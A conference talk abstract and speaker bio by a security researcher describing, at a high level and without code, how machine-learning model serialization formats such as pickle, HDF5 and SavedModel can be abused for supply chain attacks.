Malice in Chains: Supply Chain Attacks using Machine Learning Models

Marta Janus

Mar 11

This past year marked a rapid acceleration in the adoption of artificial intelligence. As AI-based solutions have started to dominate the market, a new cyber attack vector opened up taking CISOs by surprise: the exploitation of the underlying machine-learning models. These models are often treated as black boxes that process the input data and compute the output, communicating with users through an API/UI while their internals are hidden away. However, it is crucial to understand that these models are essentially code - and as such, can be manipulated in unexpected and potentially malicious ways. ML models are stored, shared, and transferred using serialization formats, such as JSON, pickle, and HDF5. While some of these formats have been known to be vulnerable, there is still not enough clarity on how the attackers can subvert these models and how they can be used to create real damage to the victims.

Unlike software, ML artifacts are not routinely checked for integrity, cryptographically signed, or even scanned by anti-malware solutions, which makes them the perfect target for cyber adversaries looking to fly under the radar. In this talk, we show how an adversary can abuse machine learning models to carry out highly damaging supply chain attacks. We start by exploring several model serialization formats used by popular ML libraries, including PyTorch, Keras, TensorFlow, and scikit-learn. We show how each of these formats can be exploited to execute arbitrary code and bypass security measures, leading to the compromise of critical ML infrastructure systems. We present various code execution methods in Python’s pickle format, show the possible abuse of Keras lambda layers in HDF5, exploit SavedModel file format via unsafe TensorFlow I/O operations, and more. Finally, we demonstrate a supply chain attack scenario in which a ransomware payload is hidden inside an ML model using steganography and then reconstructed and executed through a serialization vulnerability when the model is loaded into memory.

With the rise of public model repositories, such as Hugging Face, businesses are increasingly adopting pre-trained models in their environments, often unaware of the associated risks. Our aim is to prove that machine learning artifacts can be exploited and manipulated in the same way as any other software, and should be treated as such - with utmost care and caution.

About the Presenter: Marta Janus

Marta is a Principal Researcher at HiddenLayer, where she focuses on investigating adversarial machine learning attacks and the overall security of AI-based solutions. Before joining HiddenLayer, Marta spent over a decade working as a security researcher for leading anti-virus vendors. She has extensive experience in cyber security, threat intelligence, malware analysis, and reverse engineering. Throughout her career, Marta has produced more than three dozen publications between HiddenLayer, BlackBerry, Cylance, Securelist, and DARKReading. She also presented at industry conferences such as REcon Montreal, 44Con, BSidesSF, and Defcon AIVillage.